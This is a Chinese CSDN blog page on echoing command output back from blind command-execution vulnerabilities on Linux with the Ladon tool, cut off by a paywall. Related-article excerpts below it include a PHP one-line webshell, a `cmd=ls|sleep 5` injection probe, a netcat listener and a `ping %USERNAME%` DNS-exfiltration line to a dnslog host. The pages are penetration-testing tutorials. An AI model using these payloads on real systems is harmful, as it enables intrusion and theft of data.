无回显命令执行漏洞之Linux渗透

最新推荐文章于 2024-06-02 23:54:38 发布
最新推荐文章于 2024-06-02 23:54:38 发布
阅读量959 收藏 1
点赞数
分类专栏: GetShell 渗透 Ladon
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/k8gege/article/details/118653052
版权
本文介绍了在Linux系统中,当命令执行漏洞没有回显时,如何利用Ladon工具实现命令回显。文章详细讲解了通过浏览器、curl、Whois等方式进行回显,并提到了Ladon的不同版本对回显的支持情况,包括明文、Base64加密的回显方法,以及保存结果到txt文件的技巧。最后提供了Ladon工具的下载链接。
摘要由CSDN通过智能技术生成

前言

很多时候命令回显漏洞由于一些特殊原因,无法构造或不方便构造回显,上回讲到JAVA反序列化漏洞Ladon回显方法。本文针对Linux系统实现命令执行漏洞回显方法,虽说JAVA跨平台但并不代表所有系统都预装有JAVA,实际上.NET一样是跨平台的,前提都要系统安装才可以,那么对于未安装JAVA的机器或非JAVA程序产生的命令执行漏洞,如何实现命令回显,将是本文讲述的重点。JAVA篇:http://k8gege.org/Ladon/web_javarce.html PowerShell篇:http://k8gege.org/p/Ladon_ps1_echo.html

启动WEB

Ladon web 800

PS: 建议使用8.3以上版本,以免部分命令回显结果导致Ladon崩溃

参数
/ip.txt or ip.jpg        Get Target WanIP
/getstr/AnyString        Get Request String
/getb64/AnyString        Base64 Encode (Request String)
/deb64/Base64String      Base64 Decode (Request String)
/deb64txt/Base64String      Base64 Decode Save TXT

浏览器回显

由于是HTTP协议,可以通过浏览器访问得到Ladon回显BASE64解密结果,就是说我们只要通过命令行发送HTTP请求即可在Ladon控制台看到命令执行

最低0.47元/天 解锁文章
k8gege
关注
专栏目录
审计dvwa中高难度命令执行代码 演示无回显如何渗透 编写php实现反序列化魔法函数自动调用计算器 什么是php反序列化漏洞
qq_63074316的博客
11-21 635
序列化本意是保证编写的代码能够在互联网完整的传输个人理解:序列化和反序列化本身不存在漏洞 之所以有是由于开发者在编写时加入了恶意的代码记住链式调用!!a套b b套危险函数 魔法函数引用a 从而触发危险函数 以此引发反序列化漏洞网完整的传输a套b b套危险函数 魔法函数引用a 从而触发危险函数 以此引发反序列化漏洞chatgpt:PHP反序列化漏洞是一种存在于应用程序中的安全漏洞,它允许攻击者通过发送恶意构造的序列化数据来控制程序的行为,从而实现代码执行、数据库操作等攻击目的。
命令执行漏洞
weixin_45634365的博客
03-28 643
一、命令执行漏洞原理 用户输入的数据被当做系统命令进行执行 # 此一句话木马的本质是命令执行漏洞 # whoami显示登录名 # net user查看用户 # shutdown -t 0 -s关机 <?php system('whoami');?> 代码执行:用户输入的数据被当作后端代码执行 命令执行:用户输入的数据被当作系统命令执行 因为代码执行可以调用命令执行的函数,所以大部分代码执行都可以调用系统命令,菜刀的终端操作也是利用了命令执行的函数,但是命令执行却不能够利用代码执行,当然,
091-从无回显命令执行到getshell的渗透测试.pdf
09-20
091-从无回显命令执行到getshell的渗透测试.pdf
回显条件下的命令执行判断和利用方式研究
m0_59598029的博客
08-16 546
渗透测试、漏洞挖掘或安全研究的过程中,我们会遇到很多无回显命令执行点。面对这些无回显命令执行点,我们很难获取命令执行结果,甚至无法判断命令是否执行成功。本篇文章主要讨论面对这些无回显命令执行点时的判断和利用方法。首先我们需要知道该点是否存在命令执行漏洞,或者我们的命令是否执行成功了。这里的研判方法有很多种,最常用的是直接通过延时判断,类似我们sql注入里的时间盲注:值得一提的是,windows下并没有sleep命令,那么如何通过时间延时的方式判断windows环境下的命令执行呢?
linux 远程执行命令回显,一种无回显的远程命令执行漏洞的验证方法与流程...
weixin_30728435的博客
05-07 642
本发明属于信息技术领域,具体涉及一种无回显的远程命令执行漏洞的验证方法。背景技术:远程命令执行漏洞是一种常见的高危害级别的漏洞。通过这个漏洞,能够让攻击者在远程服务器上执行指定的命令。如whoami,cat/etc/passwd等。远程命令执行漏洞通常的验证方式是通过执行系统命令,把命令的输出内容回显到页面上来验证命令是否存在。对于远程命令执行漏洞,传统的验证方法是执行命令输出特定的内容来证明漏洞...
命令执行漏洞没有回显如何证明
Sgirll的博客
07-19 898
yakit自带dnslog平台,申请域名,执行命令,ping一下域名,
超全的命令(代码)执行漏洞回显的姿势总结(附带详细代码和测试分析过程)
记录学习,一起进步
03-05 2009
通过:重定向,dnslog外部通信,burpsuite burpcollaborator外部通信,日志监听,netcat监听,反弹shell等不同姿势突破无回显命令执行漏洞
Linux命令执行漏洞利用详解-Web攻防训练营
总结来说,理解Linux命令执行漏洞及其利用技巧对于安全防护和渗透测试都至关重要。开发者应当避免直接将用户输入传递给系统命令,而应该采用安全的方式处理用户输入,如参数化查询或使用安全的库函数。同时,系统...
通杀漏洞利用回显方法-linux平台 - 00theway _ blog _ hacker _ exp _ exploit _
08-03
【描述】:本文主要探讨了在Linux环境下,针对漏洞利用时遇到的无法获取执行结果的问题,提出了几种常见的解决方案,包括报错回显、通过Web应用获取上下文对象,以及在网络可达的情况下进行Out-of-Band(OOB)通信。...
命令执行命令执行漏洞回显如何渗透
wj33333的博客
11-21 630
命令执行漏洞回显如何渗透
PHP无回显漏洞总结
unexpectedthing的博客
11-25 1273
文章目录前言SQL注入没有回显布尔盲注时间盲注dnslog打sql注入 前言 前几天看到关于这个的总结,我也自己总结一下,同时回顾一下之前学的内容。 在渗透测试过程中,开发不可能每一次都将结果输出到页面上,也就是漏洞回显的情况,那么在这种情况下,我们可以通过dnslog判断漏洞存在,或者通过起一个python的http服务来判断,方法很多,下面主要进行一些情况的分析。 SQL注入没有回显 在sql注入中,有回显的意思是会显示出我们想要得到的内容。对于有回显的,我们有Union注入,报错注入的类型。没有回显
php--无回显情况下的命令执行
最新发布
金灰的博客
06-02 1349
免责声明:本文仅做技术交流与学习...建立通道(信道) --数据传输的路径shell_exec 与 system 相比,shell_exec没有回显结果.
RCE无回显漏洞利用
qq_32947907的博客
01-22 1275
除了上面的一些常见的方式以外,还有其它的如ICMP协议外带等等。参考链接带外攻击OOB(RCE无回显骚思路总结)-腾讯云开发者社区-腾讯云不积跬步,无以至千里;不积小流,无以成江河。
命令执行漏洞无回现如何渗透
m0_62202418的博客
11-25 443
3. 有两条记录,说明服务器ping了域名,则存在命令执行漏洞。2. ping 一下生成的域名。执行命令时,没有任何回显
[CTF]命令执行回显利用
cosmoslin的博客
02-21 9150
背景 exec,shell_exec等函数可以执行命令但没有回显,我们需要寻找方法来得到命令执行后的结果 <?php highlight__file(__FILE__) shell_exec($_GET[cmd]); ?> 判断命令是否执行 延时 利用sleep函数 cmd=ls|sleep 5 HTTP请求 目标主机通过向VPS发起HTTP请求,VPS监听到请求则代表命令执行成功(注意:ping命令不产生http请求) VPS:nc -lvp 8888 目标主机:cm
从无回显命令执行到getshell的渗透测试
Javachichi的博客
06-02 908
事情起源于一次渗透测试,机缘巧合之下,发现了一个PHP imap远程命令执行漏洞点。但尴尬的是,这块命令执行并不会有回显,由此开始了今天的探测之旅。
命令执行回显的一些姿势
zhangge3663的博客
05-31 3710
前言 最近演练遇到了拿shell后,由于是延时注入,让我极其难受。于是,学习了一下命令执行回显的一些姿势 windows环境 1.ping %USERNAME%.2plmqc.dnslog.cn 这里的%username%为用户变量 附上windows常用变量: %APPDATA% : 列出应用程序数据的默认存放位置。 %CD% : 列出当前目录。 %CLIENTNAME% : 列出联接到终端服务会话时客户端的NETBIOS名。 %CMDCMDLINE% : 列出启动当前
命令执行漏洞回显如何渗透
jj_24的博客
11-21 219
回到dnslog刷新发现有回显记录就说明存在命令执行漏洞。将print删除,然后在执行发现此时没有回显。ping 127.0.0.1也没有回显。去dnslog申请一个域名。然后ping这个域名。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值